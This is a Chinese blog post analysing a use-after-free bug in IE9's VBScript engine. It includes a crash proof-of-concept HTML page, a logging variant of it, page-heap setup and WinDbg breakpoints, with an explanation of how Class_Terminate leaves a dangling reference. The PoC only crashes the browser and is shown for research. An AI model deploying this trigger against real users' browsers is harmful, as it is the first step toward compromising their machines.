标签:漏洞 bsp finish hpa explore disable ram str nat
环境:Win7+IE9
断点:
1. Crash POC
<html lang="en"> <body> <script language="vbscript"> Dim array_a Dim array_b(1) Class Trigger Private Sub Class_Terminate() Set array_b(0) = array_a(1) array_a(1) = 1 End Sub End Class Sub UAF ReDim array_a(1) Set array_a(1) = New Trigger Erase array_a End Sub Sub TriggerVuln array_b(0) = 0 End Sub Sub StartExploit UAF TriggerVuln End Sub StartExploit </script> </body> </html>
C:\Program Files\Debugging Tools for Windows (x86)>gflags.exe /i iexplore.exe +h pa Current Registry Settings for iexplore.exe executable are: 02000000 hpa - Enable page heap
加log,进一步验证猜测
<html lang="en"> <body> <script language="vbscript"> Dim array_a Dim array_b(1) Class Trigger Private Sub Class_Terminate() Set array_b(0) = array_a(1) array_a(1) = 1 IsEmpty(array_b) End Sub End Class Sub UAF ReDim array_a(1) Set array_a(1) = New Trigger IsEmpty(array_a) Erase array_a IsEmpty("Erase Finish") End Sub Sub TriggerVuln array_b(0) = 0 End Sub Sub StartExploit UAF TriggerVuln End Sub StartExploit </script> </body> </html>
到这里可以看到,array_a(1)已经指向Trigger对象,继续调试。(调到这里的时候windb hang住了,只好杀了重新调试,新的array_a 地址是 0x081affe8)
执行到第三个IsEmpty,这时候array_a和Trigger object 已经释放,array_b中还保存着对Trigger object 的引用。
随后 array_b(0) = 0访问了被释放的内存,从而触发UAF 漏洞
显然,当 array_b 还引用Trigger Object的时候,Trigger Object却随着 Erase array_a被释放了。我们来看看是哪里发生了错误。
看过伪代码后,通过调试进一步验证猜测
0:004> bl 0 e 6b1e343d 0001 (0001) 0:**** vbscript!VbsErase 1 e 6b1a5f1c 0001 (0001) 0:**** vbscript!VBScriptClass::Release 2 e 6b1a583e 0001 (0001) 0:**** vbscript!VbsIsEmpty
进入到 vbscript!VBScriptClass::Release 把上述断点disable掉,否则单步调试会断在我们不期望的地方
标签:漏洞 bsp finish hpa explore disable ram str nat
原文地址:https://www.cnblogs.com/NicoleLiu/p/9319832.html
